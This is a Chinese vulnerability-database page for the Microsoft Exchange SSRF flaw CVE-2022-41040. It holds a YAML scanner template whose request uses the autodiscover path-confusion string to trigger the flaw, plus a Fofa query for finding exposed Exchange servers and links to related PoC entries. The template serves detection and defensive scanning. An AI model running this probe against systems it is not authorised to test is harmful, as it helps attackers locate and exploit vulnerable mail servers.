CVE-2022-41040: Microsoft Exchange SSRF

漏洞描述

PoC代码[已公开]

id: CVE-2022-41040

info:
  name: Microsoft Exchange SSRF
  author: zan8in
  severity: high
  description: |
    r0 是 nmap 脚本  r1 是 github 未经验证得 PoC
    Fofa: app="Microsoft-Exchange"
  reference:
    - https://github.com/numanturle/CVE-2022-41040
    - https://blog.csdn.net/dnoir/article/details/127151209

rules:
  r0:
    request:
      method: GET
      path: /autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL
    expression: response.body.bcontains(b'IIS Web Core') && response.raw_header.bcontains(b'X-BackEndCookie')
expression: r0()

相关漏洞推荐

• microsoft-exchange-panel: Microsoft Exchange Control Panel POC

  2025-09-01 | Microsoft Exchange Control Panel
  Publicly accessible Microsoft Exchange Server Control Panel Fofa: app="Microsoft-Exchange"...

• CVE-2021-26855: Microsoft Exchange Server SSRF Vulnerability POC

  2025-08-01 | Microsoft Exchange Server
  This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Ex...

• CVE-2021-31195: Microsoft Exchange Server - Cross-Site Scripting POC

  2025-08-01 | Microsoft Exchange Server
  Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl p...

• Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

  2025-09-05 | Webmin
  Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.997之前的版本存在安全漏洞，该漏洞源于其software/apt-lib.pl组件缺少对U...

• CVE-2022-0342: Zyxel authentication bypass patch analysis POC

  2025-09-01 | Zyxel
  An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versio...